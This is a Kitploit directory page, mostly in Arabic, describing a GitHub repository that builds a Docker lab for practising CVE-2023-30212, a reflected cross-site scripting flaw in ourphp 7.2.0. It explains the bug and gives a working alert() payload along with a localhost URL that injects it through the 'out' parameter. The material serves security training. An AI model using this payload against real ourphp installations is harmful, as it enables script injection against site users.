Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — يوفر هذا المستودع حاوية Docker لمحاكاة ثغرة CVE-2023-30212، مما يتيح لك التدرب على تأثيرها وفهمه. يتضمن دليلاً شاملاً لمساعدتك في إعداد الحاوية على جهازك الخاص. كما تتضمن الوثائق الخاصة بعملية إنشاء Docker. | Kitploit
أدوات/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

يوفر هذا المستودع حاوية Docker لمحاكاة ثغرة CVE-2023-30212، مما يتيح لك التدرب على تأثيرها وفهمه. يتضمن دليلاً شاملاً لمساعدتك في إعداد الحاوية على جهازك الخاص. كما تتضمن الوثائق الخاصة بعملية إنشاء Docker.

عرض المستودع
111منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-30212 POC : البرمجة النصية عبر المواقع

عبر /client/manage/ourphp_out.php

المنتجات المتأثرة بـ CVE-2023-30212 :

البائعالمنتجالإصدار
ourphp
ourphp
7.2.0

دليل تثبيت Docker :

لتثبيت OURPHP <= 7.2.0 في Docker، يمكنك استخدام الدليل لتثبيت Docker لأغراض الممارسة.

شرح الثغرة:

root@kitploit:~
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

خطوات إعادة إنتاج المشكلة:

root@kitploit:~
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

الحمولة الخاصة بالثغرة:

root@kitploit:~
# </script><script>alert(`xss`)</script>

فيديو

CVE-2023-30212

المراجع

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> كود مرجعي
تنزيل الأداة